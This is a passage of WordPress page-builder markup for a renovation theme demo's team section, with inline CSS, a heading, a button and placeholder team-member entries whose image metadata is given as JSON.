{\"contentWidth\":\"full_width\",\"blockId\":\"9e1e8cfd-fab2-4802-a908-eb42fd377f0e\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9e1e8cfd-fab2-4802-a908-eb42fd377f0e.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d7ebd922-4529-4400-a177-23a51b503a66\"} -->\n<style type=\"text/css\"> .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d7ebd922-4529-4400-a177-23a51b503a66 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d7ebd922-4529-4400-a177-23a51b503a66 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"d9267a42-b111-4e7f-8407-3140f59d46f7\"} -->\n<style type=\"text/css\"> .block-d9267a42-b111-4e7f-8407-3140f59d46f7 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d9267a42-b111-4e7f-8407-3140f59d46f7 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d9267a42-b111-4e7f-8407-3140f59d46f7 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d9267a42-b111-4e7f-8407-3140f59d46f7 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d9267a42-b111-4e7f-8407-3140f59d46f7 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d9267a42-b111-4e7f-8407-3140f59d46f7\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"310c8a98-f11c-4fb4-864c-1c14b1331cb0\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-310c8a98-f11c-4fb4-864c-1c14b1331cb0 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-310c8a98-f11c-4fb4-864c-1c14b1331cb0\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"440e8e0d-46aa-4cf4-90e2-33900352306b\"} -->\n<style type=\"text/css\"> .block-440e8e0d-46aa-4cf4-90e2-33900352306b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-440e8e0d-46aa-4cf4-90e2-33900352306b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-440e8e0d-46aa-4cf4-90e2-33900352306b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-440e8e0d-46aa-4cf4-90e2-33900352306b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-440e8e0d-46aa-4cf4-90e2-33900352306b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-440e8e0d-46aa-4cf4-90e2-33900352306b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"a982759b-8eb1-4278-8e6d-30ac05e73771\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left 